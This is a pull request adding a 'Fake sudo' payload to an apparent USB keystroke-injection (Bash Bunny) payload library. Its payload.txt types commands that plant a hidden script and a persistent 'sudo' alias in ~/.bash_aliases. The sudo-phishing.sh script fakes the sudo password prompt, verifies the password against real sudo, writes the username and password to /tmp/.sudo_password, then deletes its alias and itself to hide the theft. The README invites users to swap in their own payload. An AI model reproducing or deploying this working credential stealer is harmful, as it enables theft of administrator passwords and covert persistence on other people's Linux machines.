### PR TITLE
Add "Fake sudo"

### DIFF
--- a/payloads/library/phishing/fake-sudo/README.md
+++ b/payloads/library/phishing/fake-sudo/README.md
@@ -1,0 +1,48 @@
+# Fake sudo
+
+- Title:         Fake sudo
+- Author:        TW-D
+- Version:       1.0
+- Target:        Linux
+- Category:      Phishing
+
+## Description
+
+1) Copies the "sudo" command spoofing program to the user's home directory.
+2) Defines a new persistent "sudo" alias with the file "~/.bash_aliases".
+3) When the user "sudoer" executes the command "sudo" in a terminal, the spoofing program :
+- __By default__ retrieves the username and password and writes them to "/tmp/.sudo_password".
+- __But__ this behavior can be changed in line 21 of the "sudo-phishing.sh" file.
+4) After sending, the spoofing program deletes the "sudo" alias. Then it deletes itself.
+
+## Configuration
+
+From "payload.txt" change the values of the following constant :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+```
+
+From "sudo-phishing.sh" change the values of the following constants if necessary :
+```bash
+
+readonly INPUT_MESSAGE="[sudo] password for ${USER}: "
+readonly MAXIMUM_ATTEMPTS=3
+readonly ERROR_MESSAGE="sudo: ${MAXIMUM_ATTEMPTS} incorrect password attempts"
+
+```
+
+From "sudo-phishing.sh", change the payload if you wish :
+```bash
+##
+# <YOUR-PAYLOAD>
+##
+/usr/bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password
+##
+# </YOUR-PAYLOAD>
+##
+```
+

--- a/payloads/library/phishing/fake-sudo/payload.txt
+++ b/payloads/library/phishing/fake-sudo/payload.txt
@@ -1,0 +1,86 @@
+#!/bin/bash
+#
+# Title:            Fake-sudo
+#
+# Description:      
+#                   This program creates a fake "sudo" 
+#                   command by defining an persistent alias.
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Phishing
+# Target:           Linux
+# Attackmodes:      HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Ubuntu 20.04.4 LTS x86_64 (Xfce)
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Yellow quadruple blink .......................... STAGE4
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+udisk mount
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 7000
+Q CTRL-ALT t
+Q DELAY 7000
+
+LED STAGE2
+
+Q STRING " cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/"
+Q ENTER
+Q DELAY 1500
+
+Q STRING " cp ./sudo-phishing.sh ~/.sudo_phishing.sh"
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING " chmod +x ~/.sudo_phishing.sh"
+Q ENTER
+Q DELAY 1500
+
+Q STRING " printf \"\\nalias sudo='~/.sudo_phishing.sh'\\n\" >> ~/.bash_aliases"
+Q ENTER
+Q DELAY 1500
+
+LED STAGE4
+
+Q STRING " exit"
+Q ENTER
+Q DELAY 1500
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+udisk unmount
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0

--- a/payloads/library/phishing/fake-sudo/sudo-phishing.sh
+++ b/payloads/library/phishing/fake-sudo/sudo-phishing.sh
@@ -1,0 +1,41 @@
+#!/bin/bash
+#
+# Fake-sudo
+#
+# This program creates a fake "sudo" 
+# command by defining an alias.
+#
+
+readonly INPUT_MESSAGE="[sudo] password for ${USER}: "
+readonly MAXIMUM_ATTEMPTS=3
+readonly ERROR_MESSAGE="sudo: ${MAXIMUM_ATTEMPTS} incorrect password attempts"
+
+attempts() {
+    /usr/bin/echo -n "${INPUT_MESSAGE}"
+    read -r -s sudo_password
+    /usr/bin/echo ""
+    if /usr/bin/echo "${sudo_password}" | /usr/bin/sudo -S /usr/bin/true 2> /dev/null; then
+        ##
+        # <YOUR-PAYLOAD>
+        ##
+        /usr/bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password
+        ##
+        # </YOUR-PAYLOAD>
+        ##
+        /usr/bin/rm ~/.sudo_phishing.sh
+        /usr/bin/head -n -1 ~/.bash_aliases > ~/.bash_aliases_bak
+        /usr/bin/mv ~/.bash_aliases_bak ~/.bash_aliases
+        /usr/bin/echo "${sudo_password}" | /usr/bin/sudo -S "${@}"
+        $BASH
+        exit 0
+    fi
+}
+
+if (/usr/bin/sudo -n /usr/bin/true 2> /dev/null) || [ "${#}" -eq 0 ]; then
+    /usr/bin/sudo "${@}"
+else
+    for ((iterator=1; iterator <= MAXIMUM_ATTEMPTS; iterator++)); do
+        attempts "${@}"
+    done
+    /usr/bin/echo "${ERROR_MESSAGE}"
+fi


### PR DESCRIPTION
1) Copies the "sudo" command spoofing program to the user's home directory.
2) Defines a new persistent "sudo" alias with the file "~/.bash_aliases".
3) When the user "sudoer" executes the command "sudo" in a terminal, the spoofing program :
- __By default__ retrieves the username and password and writes them to "/tmp/.sudo_password".
- __But__ this behavior can be changed in line 21 of the "sudo-phishing.sh" file.
4) After sending, the spoofing program deletes the "sudo" alias. Then it deletes itself.